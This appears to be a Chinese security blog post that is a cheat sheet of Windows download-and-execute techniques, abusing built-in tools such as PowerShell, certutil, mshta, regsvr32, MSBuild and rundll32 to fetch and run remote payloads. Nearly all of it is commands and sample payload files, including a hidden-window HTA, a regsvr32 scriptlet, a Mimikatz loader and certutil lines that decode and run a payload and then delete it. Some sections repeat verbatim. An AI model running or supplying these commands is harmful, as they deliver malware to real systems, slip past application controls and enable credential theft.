Windows 执行下载命令

2018年01月10日 · 信息安全 · 103次阅读

场景需求
• 允许执行任意代码
• 支持尽可能多的Microsoft标准代码库
• 支持从远程服务器下载Payload

1.bitsadmin命令(win7及以上,只能命令下载到指定路径上):

bitsadmin /transfer myDownLoadJob /download /priority normal "http://www.example.com/1.jpg" "d:\abc.jpg"

2.powershell命名下载执行(win7及以上):

powershell IEX (New-Object Net.WebClient).DownloadString('<https://www.example.com/test.ps1>'); Invoke-Mimikatz
powershell (new-object System.Net.WebClient).DownloadFile( 'http://127.0.0.1/1.exe’,’C:\test.exe')
powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://example.com/1.jpg','d:\\1.jpg')
powershell -exec bypass -f \\webdavserver\folder\payload.ps1

3.mshta命令下载执行:

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
mshta http://webserver/payload.hta
mshta \\webdavserver\folder\payload.hta

payload.hta

<HTML> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD> 
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
<body>
demo
</body>
</HEAD> 
</HTML>

4.msiexec命令下载执行(msi文件直接加载)

msiexec /q /i <http://site.com/payloads/1.png>

5.certutil命令下载执行

certutil -urlcache -split -f http://webserver/payload payload 
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
certutil -urlcache -split -f http://example.com/a a.exe && a.exe &&  del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete

6.regsvr32命令下载执行

regsvr32 /u /n /s /i:http://webserver/1.jpg scrobj.dll
regsvr32 /u /n /s /i:\\webdavserver\folder\1.jpg scrobj.dll
regsvr32 /u /s /i:<http://site.com/js.png> scrobj.dll

js.png

<?XML version="1.0"?>
<scriptlet>
<registration
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
            ps  = "cmd.exe /c calc.exe";
            new ActiveXObject("WScript.Shell").Run(ps,0,true);
        ]]>
</script>
</registration>
</scriptlet>

7.certutil命令下载执行

certutil -urlcache -split -f http://webserver/payload payload 
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
certutil -urlcache -split -f http://site.com/a a.exe && a.exe &&  del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete

8.net中的MSBulid命令下载执行

cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

9.cscript脚本远程命令下载执行

cscript //E:jscript \\webdavserver\folder\payload.txt

downfile.vbs:

' Set your settings
strFileURL = "http://www.it1.net/images/it1_logo2.jpg"
strHDLocation = "c:\logo.jpg"
' Fetch the file
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0'Set the stream position to the start
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing

10.rundll32命令下载执行

rundll32 \\webdavserver\folder\payload.dll,entrypoint
rundll32.exe  javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

11.script脚本远程命令下载执行

downfile.vbs:
' Set your settings
strFileURL = "http://www.it1.net/images/1.jpg"
strHDLocation = "c:\1.jpg"
' Fetch the file
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0'Set the stream position to the start
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing

将以上保存为downfile.vbs
输入命令:cscript downfile.vbs

12.IEEXC命令下载执行

C:\Windows\Microsoft.NET\Framework\v2.0.50727\> caspol -s off
C:\Windows\Microsoft.NET\Framework\v2.0.50727\> IEExec <http://example.com/files/test64.exe>

13.odbcconf命令下载执行

odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

14.net中的regasm命令下载执行

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

15.pubprn.vbs下载执行命令

cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:<https://exmaple.com/test.sct>

16.odbcconf命令下载执行

odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

参考:https://xz.aliyun.com/t/1654#toc-12

标签:none

最后编辑于:2021-01-04 14:12

评论